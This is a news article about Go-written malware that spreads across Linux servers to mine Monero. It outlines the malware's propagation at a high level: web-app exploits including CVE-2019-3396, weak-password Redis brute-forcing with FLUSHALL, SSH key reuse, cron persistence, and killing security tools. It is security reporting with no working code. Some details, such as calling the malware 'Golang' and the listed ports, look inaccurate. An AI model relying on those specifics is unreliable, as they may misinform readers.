New Malware Scours Linux Servers for Monero
A new type of crypto malware,Golang, has been identified, being set up to fraudulently mine Monero (XMR) cryptocurrency on Linux servers.
Many cybersecurity companies have been releasing reports on the new malware, which is called Golang, that is capable of infecting Linux servers by using different infection tactics.
Josh Grunzweig, Palo Alto Networks Unit 42 cybersecurity researcher, believes that new malware has been developed using this language in the past months, with most of them focusing on attacking the Microsoft Windows operating system.
Grunzweig gathered more than 10,000 unique samples of Go-compiled malware and concluded that the most common malware families were Veil, GoBot2, and Hercules. Pentesting, Remote Access Trojans (RATs), and backdoors were the most used developments.
Trend Micro researchers Augusto Remillano II and Mark Vicente said the propagator was being used to insert a cryptocurrency miner payload.
Golang was first detected in May and the malware specifically targets Linux servers. The code looks for vulnerabilities in the system as well as entry points through which they can spread to networks.
According to F5 researchers, Golang has 7 propagation methods; “4 exploits targeting web applications (2 exploits targeting ThinkPHP, 1 targeting Drupal, and 1 targeting Confluence), enumeration of SSH credentials enumeration, enumeration of Redis database credentials, and attempts to connect other machines using found SSH keys.”
The malware first sends a GET request to http://ident.me, a service which returns the public IP address of a server. The IP list is then used to create a list of IP addresses in the same Class B, after which it scans 80, 20, 8090, and 6397 ports. Then a malicious request is sent to the found ports to download a payload on Pastebin.
With Confluence, the malware uses the CVE-2019-3396 vulnerability, which in the past has been exploited by cryptocurrency mining malware.
In a Redis attack, if no open ports are detected, the malware goes on to test simple passwords — such as admin, root, redis, and test – in order to establish a connection to a weak server.
Golang then removes the existing database through the FLUSHALL Redis command and then develops a scheduled task to replace it with the payload download.
The propagator also deactivates all security tools and software, deletes clear histories and logs, and looks for other cryptocurrency mining operations in operation to terminate them – keeping all CPU power to their mining activities. Also, all processes that consume over 30 percent of the available memory resources will be terminated.
Golang installs itself as a cron job and service in the system called mysqlc. The download script is then verified and re-executed every 15 minutes.
The malware blocks outgoing traffic on ports 3333, 5555, 7777, and 9999, as these ports are used for other crypto mining activities.
Golang uses a popular XMRig 2.13.1Monero mining script. F5 traced the malware to several public mining pools where under $2,000 has been earned so far. “However, this information is based only on the wallets our specific miners were using. It could be that the attacker has several wallets used by different parts of his botnet.”
It was found that the potential author of the malware goes by the username of “Nidaye222.” “Ni da ye” has a double meaning in Chinese, either uncle or something rude, depending on the context.
F5 researches traced a “GitHub profile with the same username that was created a couple of days prior to this writing. That user recently forked an open source vulnerability detection system. It is possible that this is a research hub for the malicious actor where he or she could be experimenting with additional exploits in order to expand the current campaign.”
Although Golang is not one of the most sophisticated malware in the crypto scene, its number of propagation methods, although simple, show that the creator is more into quantity than quality. Alas, this will probably not be the last time we hear about Golang.
Featured Image: The Merkle Hash